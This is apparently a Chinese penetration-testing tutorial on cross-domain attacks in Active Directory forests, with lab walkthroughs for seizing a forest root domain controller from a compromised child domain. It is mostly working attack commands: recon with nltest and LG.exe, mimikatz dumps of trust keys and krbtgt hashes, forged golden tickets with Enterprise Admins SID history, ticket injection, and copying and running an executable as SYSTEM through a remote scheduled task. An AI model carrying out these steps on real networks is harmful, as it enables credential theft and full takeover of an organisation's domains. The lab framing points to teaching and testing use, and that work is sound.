跨域攻击的方法介绍
跨域攻击的方法介绍
一、内网中的域林
很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根据不同职能区分的部门,从逻辑上以主域和子域进行区分,以方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区域。
二、跨域攻击方法
1、常规渗透方法(利用web漏洞)
2、哈希传递票据攻击
3、利用域信任关系
三、获取域信息
在域中,Enterprise Admins组(出现在林中的根域中)的成员具有对目录林中所有域的完全控制权限。在默认情况下,该组包含林中所有域控制器上具有Administrators权限的成员。
1、查看当前域中计算机的权限
whoami /all
2、查看域信任关系
nltest /domain_trusts
3、使用LG工具获取域信息
(1)获取当前域中的用户组
LG.exe 域名\.
(2)获取远程机器的本地用户组
LG.exe \\计算机名 -lu
(3)获取远程系统中的用户SID
LG.exe \\计算机名 -lu -sidsout
四、利用域信任密钥跨域
1、实验环境
| IP地址 | 所属域 | 域中地位 | 机器名 | 当前登录用户 |
|---|---|---|---|---|
| 192.168.142.10 | candada.com | candada的域控 | DC1 | candada\administrator |
| 192.168.142.20 | test.candada.com | test子域的域控 | DC2 | test\administrator |
| 192.168.142.32 | test.candada.com | test子域的机器 | win10-2 | test\can |
已经控制住DC2和win10-2,目标是进一步控制DC1。
2、实验步骤
(1)使用mimikatz获取当前域的SID、父域的SID、子域域管的NTLM信任密钥。
mimikatz lsadump::trust /patch
mimikatz lsadump::lsa /patch /user:candada$
(2)在普通的域内用户中创建创建高权限票据
mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi
mimikatz kerberos::golden /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /rc4:85ebc8bf10bf4e04c20f4b3ce0a553af /user:administrator /service:krbtgt /target:candada.com /ticket:administrator.kirbi
(3)上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据
创建CIFS服务的票据和host服务票据
shell asktgs.exe administrator.kirbi cifs/DC1.candada.com
shell asktgs.exe administrator.kirbi host/DC1.candada.com
将票据注入内存
shell kirbikator.exe lsa cifs.DC1.candada.com.kirbi
复制文件的操作
shell copy can1.exe \\dc1.candada.com\c$
shell dir \\dc1.candada.com\c$
(4)进行创建计划任务
shell schtasks /create /s dc1.candada.com /tn test /sc onstart /tr c:\can1.exe /ru system /f
(5)执行计划任务
schtasks /run /s dc1.candada.com /i /tn "test"
(6)删除计划任务
shell schtasks /delete /s dc1.candada.com /tn "test" /f
五、利用krbtgt哈希值跨域
1、实验环境
| IP地址 | 所属域 | 域中地位 | 机器名 | 当前登录用户 |
|---|---|---|---|---|
| 192.168.142.10 | candada.com | candada的域控 | DC1 | candada\administrator |
| 192.168.142.20 | test.candada.com | test子域的域控 | DC2 | test\administrator |
| 192.168.142.32 | test.candada.com | test子域的机器 | win10-2 | test\can |
已经控制住DC2和win10-2,目标是进一步控制DC1。
2、实验步骤
(1)获取Krbtgt散列
mimikatz lsadump::lsa /patch /user:krbtgt
(2)获取当前域的SID、父域的SID
mimikatz lsadump::trust /patch
(3)构造并注入黄金票据
Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列 /ptt
mimikatz Kerberos::golden /user:administrator /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /krbtgt:dd30df5d4360179f04471b39ed515274 /ptt
(4)后续可利用计划任务或者服务进行上线